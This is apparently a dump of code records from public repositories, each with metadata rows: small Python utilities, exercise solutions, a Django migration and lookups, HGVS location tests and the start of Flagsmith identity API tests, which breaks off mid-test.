    # string 'a = b' (not a number) when the arguments are equal.
    if a > b:
        return a
    elif b > a:
        return b
    else:
        return 'a = b'
print(max(123,445))
| 14.2 | 23 | 0.408451 | 22 | 142 | 2.636364 | 0.5 | 0.103448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08 | 0.471831 | 142 | 9 | 24 | 15.777778 | 0.693333 | 0 | 0 | 0 | 0 | 0 | 0.037594 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0 | 0 | 0.5 | 0.125 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a1522c78029e8e78d6169b881202b65d56797c2 | 282 | py | Python | on-box-python/op-scripts/rpc_execute.py | Juniper/junosautomation | 98938d964254606d259c41222adc83f341d73c00 | [
"Apache-2.0"
] | 117 | 2016-08-22T15:52:28.000Z | 2022-01-08T00:53:28.000Z | on-box-python/op-scripts/rpc_execute.py | hujie331/junosautomation | 98938d964254606d259c41222adc83f341d73c00 | [
"Apache-2.0"
] | 12 | 2017-10-28T09:44:44.000Z | 2018-11-21T15:12:42.000Z | on-box-python/op-scripts/rpc_execute.py | hujie331/junosautomation | 98938d964254606d259c41222adc83f341d73c00 | [
"Apache-2.0"
] | 78 | 2016-08-19T05:35:28.000Z | 2022-03-13T07:16:27.000Z | from jnpr.junos import Device
from lxml import etree
with Device() as jdev:
#with Device(host=<hostname>, user=<user>, password=<password>) as jdev:
rsp = jdev.rpc.get_interface_information(interface_name='fxp0', terse=True)
    print(etree.tostring(rsp, encoding='unicode'))
| 35.25 | 79 | 0.744681 | 40 | 282 | 5.175 | 0.675 | 0.096618 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004032 | 0.120567 | 282 | 7 | 80 | 40.285714 | 0.830645 | 0.251773 | 0 | 0 | 0 | 0 | 0.052381 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
6a16f0e08a891229cf156b400e9c36efd2cca28f | 927 | py | Python | Level2/Lessons12924/gamjapark.py | StudyForCoding/ProgrammersLevel | dc957b1c02cc4383a93b8cbf3d739e6c4d88aa25 | [
"MIT"
] | null | null | null | Level2/Lessons12924/gamjapark.py | StudyForCoding/ProgrammersLevel | dc957b1c02cc4383a93b8cbf3d739e6c4d88aa25 | [
"MIT"
] | null | null | null | Level2/Lessons12924/gamjapark.py | StudyForCoding/ProgrammersLevel | dc957b1c02cc4383a93b8cbf3d739e6c4d88aa25 | [
"MIT"
] | 1 | 2021-04-05T07:35:59.000Z | 2021-04-05T07:35:59.000Z | # 숫자의 표현
def solution(n):
answer = 0
numSum = 0
sNum = 1
for i in range(1, n+1):
numSum += i
while numSum > n:
numSum -= sNum
sNum += 1
if numSum == n:
answer += 1
return answer
'''
Grading started.
Accuracy tests
Test 1 > Passed (0.01ms, 10.1MB)
Test 2 > Passed (0.13ms, 10.1MB)
Test 3 > Passed (0.11ms, 10.1MB)
Test 4 > Passed (0.11ms, 10.2MB)
Test 5 > Passed (0.04ms, 10.1MB)
Test 6 > Passed (0.01ms, 10.2MB)
Test 7 > Passed (0.10ms, 10.2MB)
Test 8 > Passed (0.05ms, 10.2MB)
Test 9 > Passed (0.01ms, 10.2MB)
Test 10 > Passed (0.20ms, 10.1MB)
Test 11 > Passed (0.17ms, 10.1MB)
Test 12 > Passed (0.11ms, 10.1MB)
Test 13 > Passed (0.12ms, 10.1MB)
Test 14 > Passed (0.09ms, 10.2MB)
Efficiency tests
Test 1 > Passed (1.63ms, 10.1MB)
Test 2 > Passed (1.33ms, 10.2MB)
Test 3 > Passed (1.42ms, 10.1MB)
Test 4 > Passed (1.33ms, 10.2MB)
Test 5 > Passed (1.40ms, 10.2MB)
Test 6 > Passed (1.40ms, 10.2MB)
Grading result
Accuracy: 70.0
Efficiency: 30.0
Total: 100.0 / 100.0
'''
| 20.152174 | 28 | 0.521036 | 213 | 927 | 2.361502 | 0.276995 | 0.119284 | 0.111332 | 0.047714 | 0.395626 | 0.335984 | 0.190855 | 0 | 0 | 0 | 0 | 0.258165 | 0.306365 | 927 | 45 | 29 | 20.6 | 0.493002 | 0.006472 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a194449385214eb49c1fcfe773e8e618437b8ee | 552 | py | Python | core/migrations/0003_auto_20190122_0222.py | v-adhithyan/india-elections | 504772bd90bffaab32bad473523731021315afd1 | [
"MIT"
] | 7 | 2018-09-14T06:42:36.000Z | 2019-06-14T03:46:14.000Z | core/migrations/0003_auto_20190122_0222.py | v-adhithyan/india-elections | 504772bd90bffaab32bad473523731021315afd1 | [
"MIT"
] | 40 | 2019-01-01T01:56:20.000Z | 2022-03-11T23:40:57.000Z | core/migrations/0003_auto_20190122_0222.py | v-adhithyan/india-elections | 504772bd90bffaab32bad473523731021315afd1 | [
"MIT"
] | null | null | null | # Generated by Django 2.1.4 on 2019-01-22 02:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0002_auto_20190114_0136'),
]
operations = [
migrations.AddField(
model_name='tweetstats',
name='female',
field=models.PositiveIntegerField(default=0),
),
migrations.AddField(
model_name='tweetstats',
name='male',
field=models.PositiveIntegerField(default=0),
),
]
| 23 | 57 | 0.583333 | 53 | 552 | 5.981132 | 0.660377 | 0.113565 | 0.14511 | 0.170347 | 0.504732 | 0.258675 | 0 | 0 | 0 | 0 | 0 | 0.085938 | 0.304348 | 552 | 23 | 58 | 24 | 0.739583 | 0.081522 | 0 | 0.470588 | 1 | 0 | 0.112871 | 0.045545 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a2255ed18f3a43208b5113c6bb70eddd326a41f | 835 | py | Python | cidrfield/lookups.py | giantatwork/django-cidrfield | 377f3fbbf0d7db8bff63d7ff5ef55f9d7e55917a | [
"MIT"
] | 1 | 2020-04-21T09:47:56.000Z | 2020-04-21T09:47:56.000Z | cidrfield/lookups.py | giantatwork/django-cidrfield | 377f3fbbf0d7db8bff63d7ff5ef55f9d7e55917a | [
"MIT"
] | null | null | null | cidrfield/lookups.py | giantatwork/django-cidrfield | 377f3fbbf0d7db8bff63d7ff5ef55f9d7e55917a | [
"MIT"
] | 2 | 2020-03-05T14:10:56.000Z | 2021-04-06T10:58:58.000Z | from django.db.models import Lookup
class IpContains(Lookup):
lookup_name = 'contains'
def as_sql(self, compiler, connection):
lhs, lhs_params = self.process_lhs(compiler, connection)
rhs, rhs_params = self.process_rhs(compiler, connection)
params = rhs_params + lhs_params
return '%s like %s' % (rhs, lhs), params
class IpIn(Lookup):
lookup_name = 'in'
def as_sql(self, compiler, connection):
lhs, lhs_params = self.process_lhs(compiler, connection)
rhs, rhs_params = self.process_rhs(compiler, connection)
params = lhs_params + rhs_params
condition = '%s like %s' % (lhs, rhs)
if isinstance(params[0], list):
return ' or '.join([condition] * len(params[0])), tuple(params[0])
else:
return condition, params
| 32.115385 | 78 | 0.637126 | 104 | 835 | 4.961538 | 0.336538 | 0.209302 | 0.131783 | 0.046512 | 0.48062 | 0.48062 | 0.48062 | 0.48062 | 0.48062 | 0.48062 | 0 | 0.004785 | 0.249102 | 835 | 25 | 79 | 33.4 | 0.818182 | 0 | 0 | 0.315789 | 0 | 0 | 0.040719 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.052632 | 0 | 0.526316 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6a2693246d8286ad07e62c1afa099dcc47d905c0 | 603 | py | Python | Dataset/Leetcode/train/112/448.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/train/112/448.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/train/112/448.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | class Solution(object):
def XXX(self, root, sum):
"""
:type root: TreeNode
:type sum: int
:rtype: bool
"""
        count = 0
        ret = []
        def dfs(root, count):
            if root:
                count += root.val
                if not root.left and not root.right:
                    if count == sum:
                        ret.append(True)
                    return
                else:
                    dfs(root.left, count)
                    dfs(root.right, count)
        dfs(root, count)
        ret.append(False)
        return ret[0]
| 25.125 | 52 | 0.402985 | 61 | 603 | 3.983607 | 0.459016 | 0.115226 | 0.098765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006645 | 0.500829 | 603 | 23 | 53 | 26.217391 | 0.800664 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a31d508ec9acff1c86f618fe7b0d865c41dfa7e | 394 | py | Python | avrng.py | Perkoz19/avrng | 9c7222a8243acf82a06b5f63bee87002ef7222cd | [
"MIT"
] | null | null | null | avrng.py | Perkoz19/avrng | 9c7222a8243acf82a06b5f63bee87002ef7222cd | [
"MIT"
] | null | null | null | avrng.py | Perkoz19/avrng | 9c7222a8243acf82a06b5f63bee87002ef7222cd | [
"MIT"
] | null | null | null | from video import VideoHandler
from audio import AudioHandler
class Avrng():
def __init__(self, video_source, audio_source):
self.video_source = VideoHandler(video_source)
self.audio_source = AudioHandler(audio_source)
def get_byte(self):
# TODO avrng algorithm
pass
if __name__ == "__main__":
    # TODO cli app
print("Not implemented yet")
| 21.888889 | 54 | 0.685279 | 47 | 394 | 5.340426 | 0.553191 | 0.131474 | 0.119522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.238579 | 394 | 17 | 55 | 23.176471 | 0.836667 | 0.081218 | 0 | 0 | 0 | 0 | 0.075209 | 0 | 0 | 0 | 0 | 0.058824 | 0 | 1 | 0.2 | false | 0.1 | 0.2 | 0 | 0.5 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
6a36dd30d2e96e7eaa2162720caeca38be167447 | 1,464 | py | Python | core/template_parser/nodes/folder.py | GeorgOhneH/ethz-document-fetcher | 42921e5d71698a269eb54cf9d3979e4a7d88a9cf | [
"MIT"
] | 15 | 2020-03-17T15:43:46.000Z | 2022-01-08T04:23:49.000Z | core/template_parser/nodes/folder.py | GeorgOhneH/ethz-document-fetcher | 42921e5d71698a269eb54cf9d3979e4a7d88a9cf | [
"MIT"
] | 5 | 2020-03-12T10:05:27.000Z | 2021-03-03T16:01:47.000Z | core/template_parser/nodes/folder.py | GeorgOhneH/ethz-document-fetcher | 42921e5d71698a269eb54cf9d3979e4a7d88a9cf | [
"MIT"
] | 2 | 2020-03-17T17:09:20.000Z | 2020-12-28T22:59:17.000Z | import os
from core.template_parser.nodes.base import TemplateNode, NodeConfigs
from gui.constants import ASSETS_PATH
from settings.config_objs import ConfigString
class FolderConfigs(NodeConfigs):
TYPE = "folder"
TITLE_NAME = "Folder"
name = ConfigString(gui_name="Name")
def get_name(self):
if self.name is not None:
return self.name
return "+ Add Folder"
def get_folder_name(self):
return self.name
def get_icon_path(self):
return Folder.FOLDER_ICON_PATH
class Folder(TemplateNode):
FOLDER_ICON_PATH = os.path.join(ASSETS_PATH, "folder.svg")
def __init__(self, name, parent, **kwargs):
super().__init__(parent=parent,
folder_name=name,
unique_key_kwargs=dict(name=name),
**kwargs)
self.name = name
def __str__(self):
return self.name
def convert_to_dict(self, result=None):
result = {"folder": self.name}
return super().convert_to_dict(result=result)
def get_gui_name(self):
return self.name
def get_gui_icon_path(self):
return self.FOLDER_ICON_PATH
def get_type_name(self):
return "Folder"
def get_configs(self):
folder_configs = FolderConfigs(super().get_configs())
try:
folder_configs.name = self.name
except ValueError:
pass
return folder_configs
| 25.241379 | 69 | 0.630464 | 178 | 1,464 | 4.91573 | 0.292135 | 0.082286 | 0.064 | 0.061714 | 0.088 | 0.064 | 0.064 | 0 | 0 | 0 | 0 | 0 | 0.282787 | 1,464 | 57 | 70 | 25.684211 | 0.833333 | 0 | 0 | 0.095238 | 0 | 0 | 0.034153 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.238095 | false | 0.02381 | 0.095238 | 0.142857 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
6a3eb9cc2ab23e7842d44b902fa7f14075ddefa5 | 9,112 | py | Python | tests/test_hgvs_location.py | John-F-Wagstaff/vv_hgvs | 14e06ec1409fee0fdb4bcdbc33eb608db6ece08c | [
"Apache-2.0"
] | 2 | 2020-11-13T02:40:26.000Z | 2021-01-15T03:09:52.000Z | tests/test_hgvs_location.py | John-F-Wagstaff/vv_hgvs | 14e06ec1409fee0fdb4bcdbc33eb608db6ece08c | [
"Apache-2.0"
] | 1 | 2022-03-08T05:31:10.000Z | 2022-03-08T05:31:10.000Z | tests/test_hgvs_location.py | John-F-Wagstaff/vv_hgvs | 14e06ec1409fee0fdb4bcdbc33eb608db6ece08c | [
"Apache-2.0"
] | 3 | 2020-06-24T09:18:06.000Z | 2021-02-02T12:47:57.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import pytest
from vvhgvs.exceptions import HGVSError, HGVSUnsupportedOperationError
from vvhgvs.enums import Datum
import vvhgvs.location
import vvhgvs.parser
@pytest.mark.quick
@pytest.mark.models
class Test_SimplePosition(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.hp = vvhgvs.parser.Parser()
def test_success(self):
self.assertEqual(str(vvhgvs.location.SimplePosition(5)), "5")
self.assertEqual(str(vvhgvs.location.SimplePosition(5, uncertain=True)), "(5)")
self.assertEqual(str(vvhgvs.location.SimplePosition(None)), "?")
def test_failure(self):
with self.assertRaises(AssertionError):
self.assertEqual(vvhgvs.location.SimplePosition(-1), "SHOULD FAIL")
def test_simple_subtraction(self):
self.assertEqual(vvhgvs.location.SimplePosition(5) - vvhgvs.location.SimplePosition(3), 2)
def test_simple_comparision(self):
var = self.hp.parse_hgvs_variant("NC_000007.13:g.36561662_36561683del")
self.assertFalse(var.posedit.pos.start == var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start < var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start <= var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start >= var.posedit.pos.end)
var = self.hp.parse_hgvs_variant("NC_000007.13:g.36561662C>T")
self.assertTrue(var.posedit.pos.start == var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start < var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start <= var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start >= var.posedit.pos.end)
@pytest.mark.quick
class Test_BaseOffsetPosition(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.hp = vvhgvs.parser.Parser()
def test_success(self):
# r.5
cdsp = vvhgvs.location.BaseOffsetPosition(5)
self.assertEqual(cdsp.datum, Datum.SEQ_START)
self.assertEqual(cdsp.base, 5)
self.assertEqual(cdsp.offset, 0)
self.assertEqual(str(cdsp), "5")
self.assertFalse(cdsp.is_intronic)
#r.5+6
cdsp.offset = 6
self.assertEqual(str(cdsp), "5+6")
self.assertTrue(cdsp.is_intronic)
#r.5+?
cdsp.offset = None
self.assertEqual(str(cdsp), "5+?")
self.assertTrue(cdsp.is_intronic)
#r.(5+?)
cdsp.uncertain = True
self.assertEqual(str(cdsp), "(5+?)")
# c.*5
cdsp = vvhgvs.location.BaseOffsetPosition(5, datum=Datum.CDS_END)
self.assertEqual(cdsp.datum, Datum.CDS_END)
self.assertEqual(cdsp.base, 5)
self.assertEqual(cdsp.offset, 0)
self.assertEqual(str(cdsp), "*5")
cdsp.uncertain = True
self.assertEqual(str(cdsp), "(*5)")
cdsp.offset = 7
self.assertEqual(str(cdsp), "(*5+7)")
def test_baseoffset_subtraction(self):
v30 = vvhgvs.location.BaseOffsetPosition(3, 0)
v50 = vvhgvs.location.BaseOffsetPosition(5, 0)
v52 = vvhgvs.location.BaseOffsetPosition(5, 2)
v54 = vvhgvs.location.BaseOffsetPosition(5, 4)
self.assertEqual(v50 - v30, 2)
with self.assertRaises(HGVSError):
_ = v54 - v30
def test_baseoffset_comparision(self):
var = self.hp.parse_hgvs_variant("NM_000030.2:c.669_680del")
self.assertFalse(var.posedit.pos.start == var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start < var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start <= var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start >= var.posedit.pos.end)
var = self.hp.parse_hgvs_variant("NM_000030.2:c.679_680+2del")
self.assertFalse(var.posedit.pos.start == var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start < var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start <= var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start >= var.posedit.pos.end)
var = self.hp.parse_hgvs_variant("NM_000030.2:c.-6_680+2del")
self.assertFalse(var.posedit.pos.start == var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start < var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start <= var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start >= var.posedit.pos.end)
var = self.hp.parse_hgvs_variant("NM_000030.2:c.680+2_680+10del")
self.assertFalse(var.posedit.pos.start == var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start < var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start <= var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start >= var.posedit.pos.end)
var = self.hp.parse_hgvs_variant("NM_000030.2:c.680+2_*82del")
self.assertFalse(var.posedit.pos.start == var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start < var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start <= var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start >= var.posedit.pos.end)
var = self.hp.parse_hgvs_variant("NM_000030.2:c.-12_*82del")
self.assertFalse(var.posedit.pos.start == var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start < var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start <= var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start >= var.posedit.pos.end)
var = self.hp.parse_hgvs_variant("NM_000030.2:c.680+2_681del")
self.assertFalse(var.posedit.pos.start == var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start < var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start <= var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start >= var.posedit.pos.end)
var = self.hp.parse_hgvs_variant("NM_000030.2:c.680+2_681-32del")
with self.assertRaises(HGVSUnsupportedOperationError):
var.posedit.pos.start < var.posedit.pos.end
@pytest.mark.quick
class Test_AAPosition(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.hp = vvhgvs.parser.Parser()
def test_AAPosition(self):
ap = vvhgvs.location.AAPosition(15, "S")
self.assertEqual(ap.pos, 15)
self.assertEqual(str(ap), "Ser15")
def test_aaposition_subtraction(self):
l1 = vvhgvs.location.AAPosition(15, 'S')
l2 = vvhgvs.location.AAPosition(20, 'S')
self.assertEqual(l2 - l1, 5)
def test_aaposition_comparision(self):
var = self.hp.parse_hgvs_variant("NP_000042.3:p.His1082_Val1085delinsLeuHisGlnAla")
self.assertTrue(var.posedit.pos.start < var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
var = self.hp.parse_hgvs_variant("NP_000042.3:p.His1082ArgfsTer2")
self.assertFalse(var.posedit.pos.start < var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
@pytest.mark.quick
class Test_Interval(unittest.TestCase):
def test_Interval(self):
ival = vvhgvs.location.Interval(
vvhgvs.location.BaseOffsetPosition(base=12, offset=+34), vvhgvs.location.BaseOffsetPosition(
base=56, offset=-78))
self.assertEqual(ival.start.base, 12)
self.assertEqual(ival.start.offset, 34)
self.assertEqual(ival.end.base, 56)
self.assertEqual(ival.end.offset, -78)
self.assertEqual(str(ival), "12+34_56-78")
def test_length(self):
ival = vvhgvs.location.Interval(
vvhgvs.location.BaseOffsetPosition(base=12, offset=0), vvhgvs.location.BaseOffsetPosition(base=50, offset=0))
self.assertEqual(ival._length(), 39)
if __name__ == "__main__":
unittest.main()
# <LICENSE>
# Copyright 2018 HGVS Contributors (https://github.com/biocommons/hgvs)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# </LICENSE>
| 41.607306 | 121 | 0.683055 | 1,220 | 9,112 | 5.02623 | 0.156557 | 0.163079 | 0.212003 | 0.146771 | 0.685584 | 0.647913 | 0.630463 | 0.598989 | 0.581376 | 0.568167 | 0 | 0.038684 | 0.182946 | 9,112 | 218 | 122 | 41.798165 | 0.784956 | 0.072432 | 0 | 0.464516 | 0 | 0 | 0.04911 | 0.041163 | 0 | 0 | 0 | 0 | 0.535484 | 1 | 0.096774 | false | 0 | 0.045161 | 0 | 0.167742 | 0.006452 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a447e4aa557dcab9f3ab780011fabc35ec887ea | 270 | py | Python | services/responses/startapp_report_response.py | glaceon2000/interads | 6ad872634a2b1f3d51fb10fcbc37e9211b72ea97 | [
"MIT"
] | null | null | null | services/responses/startapp_report_response.py | glaceon2000/interads | 6ad872634a2b1f3d51fb10fcbc37e9211b72ea97 | [
"MIT"
] | null | null | null | services/responses/startapp_report_response.py | glaceon2000/interads | 6ad872634a2b1f3d51fb10fcbc37e9211b72ea97 | [
"MIT"
] | null | null | null |
class StartAppReportObject:
def __init__(self, result):
self.data = result["data"]
    def __eq__(self, other):
        if type(other) != type(self):
            return False
        return self.data == other.data
dbed6545ce0758e6b2d8e441a9a0c1f8e8aba801 | 440 | py | Python | cycleb.py | pakit/test_recipes | aa5379e4a4ef2d4019f6e8e3a87a06d529e0f910 | [
"BSD-3-Clause"
] | null | null | null | cycleb.py | pakit/test_recipes | aa5379e4a4ef2d4019f6e8e3a87a06d529e0f910 | [
"BSD-3-Clause"
] | null | null | null | cycleb.py | pakit/test_recipes | aa5379e4a4ef2d4019f6e8e3a87a06d529e0f910 | [
"BSD-3-Clause"
] | null | null | null | """ Formula that requires cyclea recipe. """
from pakit import Dummy, Recipe
class Cycleb(Recipe):
"""
Dummy recipe does nothing special but have dependency.
"""
def __init__(self):
super(Cycleb, self).__init__()
self.homepage = 'dummy'
self.repos = {
'stable': Dummy()
}
self.requires = ['cyclea']
def build(self):
pass
def verify(self):
pass
| 20 | 58 | 0.559091 | 46 | 440 | 5.173913 | 0.586957 | 0.117647 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.322727 | 440 | 21 | 59 | 20.952381 | 0.798658 | 0.206818 | 0 | 0.153846 | 0 | 0 | 0.052147 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.230769 | false | 0.153846 | 0.076923 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
dbf157cb289f0dae04177584f511507c6cff78a7 | 23,606 | py | Python | api/environments/identities/tests/test_views.py | dabeeeenster/flagsmith | cda8afc76b1794c3e633fa9959df514194a8a846 | [
"BSD-3-Clause"
] | null | null | null | api/environments/identities/tests/test_views.py | dabeeeenster/flagsmith | cda8afc76b1794c3e633fa9959df514194a8a846 | [
"BSD-3-Clause"
] | null | null | null | api/environments/identities/tests/test_views.py | dabeeeenster/flagsmith | cda8afc76b1794c3e633fa9959df514194a8a846 | [
"BSD-3-Clause"
] | null | null | null | import json
import urllib
from unittest import mock
from unittest.case import TestCase
import pytest
from django.test import override_settings
from django.urls import reverse
from rest_framework import status
from rest_framework.request import Request
from rest_framework.test import APIClient, APITestCase
from environments.identities.helpers import (
get_hashed_percentage_for_object_ids,
)
from environments.identities.models import Identity
from environments.identities.traits.models import Trait
from environments.models import Environment
from features.models import Feature, FeatureSegment, FeatureState
from integrations.amplitude.models import AmplitudeConfiguration
from organisations.models import Organisation, OrganisationRole
from projects.models import Project
from segments import models
from segments.models import Condition, Segment, SegmentRule
from util.tests import Helper
@pytest.mark.django_db
class IdentityTestCase(TestCase):
identifier = "user1"
put_template = '{ "enabled" : "%r" }'
post_template = '{ "feature" : "%s", "enabled" : "%r" }'
feature_states_url = "/api/v1/environments/%s/identities/%s/featurestates/"
feature_states_detail_url = feature_states_url + "%d/"
identities_url = "/api/v1/environments/%s/identities/%s/"
def setUp(self):
self.client = APIClient()
user = Helper.create_ffadminuser()
self.client.force_authenticate(user=user)
self.organisation = Organisation.objects.create(name="Test Org")
user.add_organisation(
self.organisation, OrganisationRole.ADMIN
) # admin to bypass perms
self.project = Project.objects.create(
name="Test project", organisation=self.organisation
)
self.environment = Environment.objects.create(
name="Test Environment", project=self.project
)
self.identity = Identity.objects.create(
identifier=self.identifier, environment=self.environment
)
def test_should_return_identities_list_when_requested(self):
# Given - set up data
# When
response = self.client.get(
self.identities_url % (self.identity.environment.api_key, self.identity.id)
)
# Then
assert response.status_code == status.HTTP_200_OK
def test_should_create_identity_feature_when_post(self):
# Given
feature = Feature.objects.create(name="feature1", project=self.project)
# When
response = self.client.post(
self.feature_states_url
% (self.identity.environment.api_key, self.identity.id),
data=self.post_template % (feature.id, True),
content_type="application/json",
)
# Then
identity_features = self.identity.identity_features
assert response.status_code == status.HTTP_201_CREATED
assert identity_features.count() == 1
def test_should_return_BadRequest_when_duplicate_identityFeature_is_posted(self):
# Given
feature = Feature.objects.create(name="feature2", project=self.project)
# When
initial_response = self.client.post(
self.feature_states_url
% (self.identity.environment.api_key, self.identity.id),
data=self.post_template % (feature.id, True),
content_type="application/json",
)
second_response = self.client.post(
self.feature_states_url
% (self.identity.environment.api_key, self.identity.id),
data=self.post_template % (feature.id, True),
content_type="application/json",
)
# Then
identity_feature = self.identity.identity_features
assert initial_response.status_code == status.HTTP_201_CREATED
